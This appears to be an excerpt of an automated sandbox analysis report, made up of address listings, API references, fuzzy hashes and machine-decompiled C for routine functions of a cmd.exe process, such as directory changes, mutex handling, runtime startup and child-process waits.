                                    0x011decd4
                                    0x011decd6
                                    0x011ec092
                                    0x011ec092
                                    0x011decdc
                                    0x011dece6
                                    0x011dece6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deb78
                                    0x011deb9b
                                    0x011deb9f
                                    0x011deba2
                                    0x011deba7
                                    0x00000000
                                    0x00000000
                                    0x011ec073
                                    0x011dec20
                                    0x011dec20
                                    0x011dec26
                                    0x011dec28
                                    0x011dec30
                                    0x011dec37
                                    0x011dec3d
                                    0x011dec42
                                    0x011dec8a
                                    0x011dec91
                                    0x011deca9
                                    0x011decb0
                                    0x011ec084
                                    0x00000000
                                    0x011ec08a
                                    0x00000000
                                    0x011ec08a
                                    0x011decb6
                                    0x011decb6
                                    0x011decb6
                                    0x011decba
                                    0x011decbd
                                    0x011decc2
                                    0x00000000
                                    0x00000000
                                    0x011decc8
                                    0x011decc2
                                    0x011dec97
                                    0x011dec9c
                                    0x011deca2
                                    0x011deca7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deca7
                                    0x011dec44
                                    0x011dec4f
                                    0x011dec55
                                    0x011dec5a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dec5a
                                    0x00000000
                                    0x011dec42
                                    0x011dec60
                                    0x011dec6d
                                    0x011dec78
                                    0x011dec78
                                    0x011dec7b
                                    0x011dec85
                                    0x011deb5a
                                    0x011deb5a
                                    0x011deb5a
                                    0x011deb5a
                                    0x00000000
                                    0x011deb26
                                    0x011deb26
                                    0x011deb2d
                                    0x011deb33
                                    0x011deb38
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deb3e
                                    0x011deb49
                                    0x011deb4f
                                    0x011deb52
                                    0x011debde
                                    0x011debe3
                                    0x00000000
                                    0x011debe9
                                    0x011debe9
                                    0x011debe9
                                    0x011debec
                                    0x011debf2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011debf2
                                    0x00000000
                                    0x011ded40
                                    0x011ded40
                                    0x00000000
                                    0x011debf8
                                    0x011debfd
                                    0x011dec03
                                    0x011dec06
                                    0x011dec0e
                                    0x011dec11
                                    0x011dec14
                                    0x011dec1a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dec1a
                                    0x011dec60
                                    0x011dec26
                                    0x011debad
                                    0x011debad
                                    0x011debb5
                                    0x011debb7
                                    0x011debc5
                                    0x011ec09a
                                    0x011ec0a6
                                    0x011ec0ac
                                    0x011ec0ad
                                    0x011ec0ad
                                    0x011ec0ad
                                    0x011ec0b0
                                    0x011ec0b0
                                    0x011ec0b3
                                    0x011ec0b6
                                    0x011ec0bf
                                    0x011dedfa
                                    0x011dedfa
                                    0x011dedfa
                                    0x011dee02
                                    0x011dee04
                                    0x011dee09
                                    0x00000000
                                    0x00000000
                                    0x011dee0f
                                    0x011dee14
                                    0x011ec0cb
                                    0x011ec0cb
                                    0x011dee1a
                                    0x011dee1e
                                    0x011ec0d5
                                    0x011ec0d5
                                    0x011dee32
                                    0x011ec0f0
                                    0x011ec0f0
                                    0x011dee38
                                    0x011dee38
                                    0x011dee3a
                                    0x011dee3c
                                    0x011dee40
                                    0x011ec0eb
                                    0x011ec0eb
                                    0x00000000
                                    0x011dee46
                                    0x011dee46
                                    0x011ec0df
                                    0x011ec0e2
                                    0x011ec0e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ec0e5
                                    0x011dee51
                                    0x00000000
                                    0x011dee57
                                    0x011dee59
                                    0x011dee59
                                    0x011dee51
                                    0x011dee40
                                    0x011dee5b
                                    0x011dee5d
                                    0x011dee64
                                    0x011dee67
                                    0x011dee69
                                    0x011dee99
                                    0x011dee99
                                    0x011dee6b
                                    0x011dee7a
                                    0x011dee7c
                                    0x011dee80
                                    0x011dee84
                                    0x011dee8b
                                    0x00000000
                                    0x011dee8d
                                    0x011dee8d
                                    0x011dee90
                                    0x011dee91
                                    0x011dee94
                                    0x011dee97
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dee97
                                    0x00000000
                                    0x011dee8b
                                    0x011deea0
                                    0x00000000
                                    0x00000000
                                    0x011deea0
                                    0x011deea2
                                    0x011deea2
                                    0x011deea7
                                    0x011deea7
                                    0x011deeaa
                                    0x011deda4
                                    0x011dedbc
                                    0x011dede9
                                    0x011dedec
                                    0x011dedf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dedbe
                                    0x011dedbe
                                    0x011dedca
                                    0x011deeb2
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb7
                                    0x011deeb9
                                    0x011deebc
                                    0x011deec0
                                    0x00000000
                                    0x011dedd0
                                    0x011dedd5
                                    0x00000000
                                    0x011dedd5
                                    0x011dedca
                                    0x00000000
                                    0x011dedbc
                                    0x011dedde
                                    0x011dede8
                                    0x00000000
                                    0x011dede8
                                    0x011ec0f7
                                    0x011ec103
                                    0x011ec109
                                    0x011ec111
                                    0x011ec117
                                    0x011ec117
                                    0x011defea
                                    0x011defef
                                    0x011ec125
                                    0x011ec125
                                    0x011deff5
                                    0x011deffb
                                    0x00000000
                                    0x011deffb
                                    0x011debcb
                                    0x011debce
                                    0x011debcf
                                    0x011debd2
                                    0x011debdb
                                    0x011debdb
                                    0x00000000
                                    0x011debc5
                                    0x011de9d9
                                    0x011de9d9
                                    0x011de9df
                                    0x011de9e4
                                    0x011de9ec
                                    0x011dea31
                                    0x00000000
                                    0x011dea33
                                    0x011de9ee
                                    0x011de9f8
                                    0x011de9fa
                                    0x011dea00
                                    0x011dea07
                                    0x011dea0e
                                    0x00000000
                                    0x011dea10
                                    0x011dea10
                                    0x011dea13
                                    0x011dea16
                                    0x011dea19
                                    0x00000000
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea19
                                    0x011dea24
                                    0x011dea26
                                    0x00000000
                                    0x011dea26
                                    0x011dea22
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dea22
                                    0x011de9ec
                                    0x011dea29
                                    0x011dea2e
                                    0x011dea2e
                                    0x011de9d3
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011DEC37
                                    • wcschr.MSVCRT ref: 011DEC4F
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000000,?,011DED9F,?,00000000,?), ref: 011EC024
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC036
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,?), ref: 011EC049
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC05B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                    • String ID:
                                    • API String ID: 2511250921-0
                                    • Opcode ID: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction ID: 855c1b3e7172a5eb656384bddc97ad64c30c504bc0c15a4a9b2322f28b364cc7
                                    • Opcode Fuzzy Hash: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction Fuzzy Hash: 14412C31601212C7EF3C5F6CD8987B637A5EF90706F04056EE9469B185EF709884CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F93E2, Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E011F93E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0x11fd0b4; // 0x2833377e
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E011E0C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E011E6FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E011DCFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E011E3A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E011DC5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t80 = 0x1213ab0;
					}
					_t83 =  *0x1213cc0;
					_t49 = E011E36CB(_t68, _t80,  *0x1213cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}
































                                    0x011f93e2
                                    0x011f93e5
                                    0x011f93e7
                                    0x011f93e8
                                    0x011f93f3
                                    0x011f93f7
                                    0x011f93ff
                                    0x011f9406
                                    0x011f9410
                                    0x011f9415
                                    0x011f9417
                                    0x011f941a
                                    0x011f9425
                                    0x011f9427
                                    0x011f9450
                                    0x011f954b
                                    0x011f954e
                                    0x011f9558
                                    0x011f955b
                                    0x011f9567
                                    0x011f9567
                                    0x011f9458
                                    0x011f9459
                                    0x011f9463
                                    0x011f9469
                                    0x011f946a
                                    0x011f9470
                                    0x011f9479
                                    0x011f947d
                                    0x011f9498
                                    0x011f9498
                                    0x011f949d
                                    0x011f949f
                                    0x011f949f
                                    0x011f94a9
                                    0x011f94ac
                                    0x011f94b1
                                    0x011f94b3
                                    0x011f94b3
                                    0x011f94bd
                                    0x011f94c1
                                    0x011f94c6
                                    0x011f94c8
                                    0x011f94c8
                                    0x011f94d0
                                    0x011f94d1
                                    0x011f94d5
                                    0x011f94da
                                    0x011f94dc
                                    0x011f94dc
                                    0x011f94e4
                                    0x011f94e8
                                    0x011f94ed
                                    0x011f94ef
                                    0x011f94ef
                                    0x011f94f5
                                    0x011f94f8
                                    0x011f94fd
                                    0x011f9502
                                    0x011f9504
                                    0x011f9504
                                    0x011f950b
                                    0x011f9513
                                    0x011f9515
                                    0x011f951c
                                    0x011f951d
                                    0x011f9523
                                    0x011f9526
                                    0x011f9529
                                    0x011f9529
                                    0x011f952f
                                    0x011f952f
                                    0x011f9537
                                    0x011f9539
                                    0x011f9539
                                    0x011f953e
                                    0x011f9546
                                    0x00000000
                                    0x011f9546
                                    0x011f9488
                                    0x00000000
                                    0x00000000
                                    0x011f9496
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011F9427
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F954E
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 011F9480
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 011F9490
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 011F950B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9516
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9529
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                    • String ID:
                                    • API String ID: 920682188-0
                                    • Opcode ID: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction ID: 3cf2fd26c6c5f8520a21dc510bc602aab42f822614b94fcb95667366dc233f2d
                                    • Opcode Fuzzy Hash: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction Fuzzy Hash: 7D41B431A00219ABDF29DFA5E858BEEB7B4FF58718F00419DE905E7250EB34DA84CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F17B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E011F17B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E011E274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E011F2D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E011F1578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E011F292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E011F250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E011F292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E011F2D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E011F1EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E011E6FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}




















                                    0x011f17b6
                                    0x011f17c1
                                    0x011f17c8
                                    0x011f17ce
                                    0x011f17d5
                                    0x011f17ef
                                    0x011f17f7
                                    0x011f1805
                                    0x011f180b
                                    0x011f180d
                                    0x011f1815
                                    0x011f1833
                                    0x011f1839
                                    0x011f183f
                                    0x011f184b
                                    0x011f1852
                                    0x011f1856
                                    0x011f1871
                                    0x011f1874
                                    0x011f1858
                                    0x011f185b
                                    0x011f185c
                                    0x011f1863
                                    0x011f1864
                                    0x011f1864
                                    0x011f1878
                                    0x011f1883
                                    0x011f18b7
                                    0x011f18b8
                                    0x011f18be
                                    0x011f18c4
                                    0x011f18c9
                                    0x011f18cd
                                    0x00000000
                                    0x011f18cf
                                    0x011f18cf
                                    0x00000000
                                    0x011f18cf
                                    0x00000000
                                    0x011f1885
                                    0x011f1885
                                    0x011f188b
                                    0x011f188c
                                    0x011f188e
                                    0x011f188e
                                    0x011f188e
                                    0x011f187a
                                    0x011f187a
                                    0x011f18d4
                                    0x011f18d4
                                    0x011f18dd
                                    0x011f18dd
                                    0x011f1897
                                    0x011f18a9
                                    0x011f18af
                                    0x011f18b2
                                    0x00000000
                                    0x011f18b2
                                    0x011f18e4
                                    0x011f1817
                                    0x011f181c
                                    0x011f181c
                                    0x011f18ea
                                    0x011f18ec
                                    0x011f18f9
                                    0x00000000
                                    0x011f18fa
                                    0x011f1913

                                    APIs
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 011F17D7
                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 011F1805
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 011F189F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 011F18EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                    • API String ID: 3048291649-2303653343
                                    • Opcode ID: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction ID: 20532989193382df4dd7e8a453e33cca442cd0ce9d3e926a420876a1f1f93007
                                    • Opcode Fuzzy Hash: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction Fuzzy Hash: 0B312871E40129EBCB2DDB54DD88FEA7775ABA0704F0141ADEA09A7244DB709D41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6E03, Relevance: 10.6, APIs: 7, Instructions: 99sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E011E6E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t10;
				intOrPtr _t14;
				intOrPtr _t20;
				intOrPtr* _t21;
				int _t34;
				intOrPtr _t36;
				int _t38;
				void* _t40;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x11fbe78);
				E011E75CC(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t34 = 0;
				while(1) {
					_t20 = _t36;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t36) {
						Sleep(0x3e8);
						continue;
					} else {
						_t38 = 1;
						_t34 = 1;
					}
					L6:
					_t47 =  *0x11fd514 - _t38; // 0x0
					if(_t47 != 0) {
						__eflags =  *0x11fd514; // 0x0
						if(__eflags != 0) {
							 *0x11fd19c = _t38;
							goto L12;
						} else {
							 *0x11fd514 = _t38;
							_t10 = E011E6F72(_t20, 0x11d1c04, 0x11d1c10);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L011E73C4();
						L12:
						_t48 =  *0x11fd514 - _t38; // 0x0
						if(_t48 == 0) {
							_push(0x11d1c00);
							_push(0x11d1bd8);
							L011E75C6();
							 *0x11fd514 = 2;
						}
						if(_t34 == 0) {
							_t10 =  *0x11fd510;
							 *0x11fd510 = 0;
						}
						_t51 =  *0x11fd520;
						if( *0x11fd520 != 0) {
							_t10 = E011E7420(_t51, 0x11fd520);
							if(_t10 != 0) {
								_t38 =  *0x11fd520; // 0x0
								 *0x12194b4(0, 2, 0);
								_t10 =  *_t38();
							}
						}
						_push( *0x11fd1a8);
						_push( *0x11fd1a4);
						_push( *0x11fd1a0);
						E011E44FC();
						 *0x11fd198 = _t10;
						if( *0x11fd1b0 != 0) {
							__eflags =  *0x11fd19c;
							if( *0x11fd19c == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
							L24:
							return E011E7614(0, _t34, _t38);
						} else {
							exit(_t10);
							_t21 =  *((intOrPtr*)(_t40 - 0x14));
							_t14 =  *((intOrPtr*)( *_t21));
							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
							_push(_t21);
							_push(_t14);
							L011E731E();
							return _t14;
						}
					}
				}
				_t38 = 1;
				__eflags = 1;
				goto L6;
			}













                                    0x011e6e03
                                    0x011e6e05
                                    0x011e6e0a
                                    0x011e6e11
                                    0x011e6e1a
                                    0x011e6e1d
                                    0x011e6e1f
                                    0x011e6e24
                                    0x011e6e26
                                    0x011e6e28
                                    0x011e6e2e
                                    0x00000000
                                    0x00000000
                                    0x011e6e32
                                    0x011e6e40
                                    0x00000000
                                    0x011e6e34
                                    0x011e6e36
                                    0x011e6e37
                                    0x011e6e37
                                    0x011e6e4b
                                    0x011e6e4b
                                    0x011e6e51
                                    0x011e6e5d
                                    0x011e6e63
                                    0x011e6e91
                                    0x00000000
                                    0x011e6e65
                                    0x011e6e65
                                    0x011e6e75
                                    0x011e6e7c
                                    0x011e6e7e
                                    0x00000000
                                    0x011e6e80
                                    0x011e6e80
                                    0x00000000
                                    0x011e6e87
                                    0x011e6e7e
                                    0x011e6e53
                                    0x011e6e53
                                    0x011e6e55
                                    0x011e6e97
                                    0x011e6e97
                                    0x011e6e9d
                                    0x011e6e9f
                                    0x011e6ea4
                                    0x011e6ea9
                                    0x011e6eb0
                                    0x011e6eb0
                                    0x011e6ebc
                                    0x011e6ec5
                                    0x011e6ec5
                                    0x011e6ec5
                                    0x011e6ec7
                                    0x011e6ece
                                    0x011e6ed5
                                    0x011e6edd
                                    0x011e6ee3
                                    0x011e6eeb
                                    0x011e6ef1
                                    0x011e6ef1
                                    0x011e6edd
                                    0x011e6ef3
                                    0x011e6ef9
                                    0x011e6eff
                                    0x011e6f05
                                    0x011e6f0d
                                    0x011e6f19
                                    0x011e6f51
                                    0x011e6f58
                                    0x011e6f5a
                                    0x011e6f60
                                    0x011e6f65
                                    0x011e6f6c
                                    0x011e6f71
                                    0x011e6f1b
                                    0x011e6f1c
                                    0x011e6f22
                                    0x011e6f27
                                    0x011e6f29
                                    0x011e6f2c
                                    0x011e6f2d
                                    0x011e6f2e
                                    0x011e6f35
                                    0x011e6f35
                                    0x011e6f19
                                    0x011e6e51
                                    0x011e6e4a
                                    0x011e6e4a
                                    0x00000000

                                    APIs
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,011FBE78,00000010), ref: 011E6E40
                                    • _amsg_exit.MSVCRT ref: 011E6E55
                                    • _initterm.MSVCRT ref: 011E6EA9
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 011E6ED5
                                    • exit.MSVCRT ref: 011E6F1C
                                    • _XcptFilter.MSVCRT ref: 011E6F2E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                    • String ID:
                                    • API String ID: 796493780-0
                                    • Opcode ID: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction ID: c01f00fc130d3599109980b28f18ab596af904923a45020686dd5d407ba42614
                                    • Opcode Fuzzy Hash: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction Fuzzy Hash: 85319071544A229FEF3EDBE8F80D7293BF0AB24729F50002DE512972D4DB305980CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4C3E, Relevance: 10.5, APIs: 7, Instructions: 42synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E011E4C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0x11fd0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 1;
					LeaveCriticalSection( *0x1203858);
					fflush(E011E7721(fprintf(E011E7721(_t8, 2), "^C"), 2));
				}
				 *0x11fd0db = 1;
				CloseHandle(_t18);
				return _v8;
			}







                                    0x011e4c43
                                    0x011e4c44
                                    0x011e4c49
                                    0x011e4c4b
                                    0x011e4c55
                                    0x011e4c60
                                    0x011e4c6d
                                    0x011eee57
                                    0x011eee63
                                    0x011eee6d
                                    0x011eee8f
                                    0x011eee95
                                    0x011e4c74
                                    0x011e4c7b
                                    0x011e4c88

                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C55
                                    • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C60
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C7B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE6D
                                    • fprintf.MSVCRT ref: 011EEE81
                                    • fflush.MSVCRT ref: 011EEE8F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                    • String ID:
                                    • API String ID: 4271573189-0
                                    • Opcode ID: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
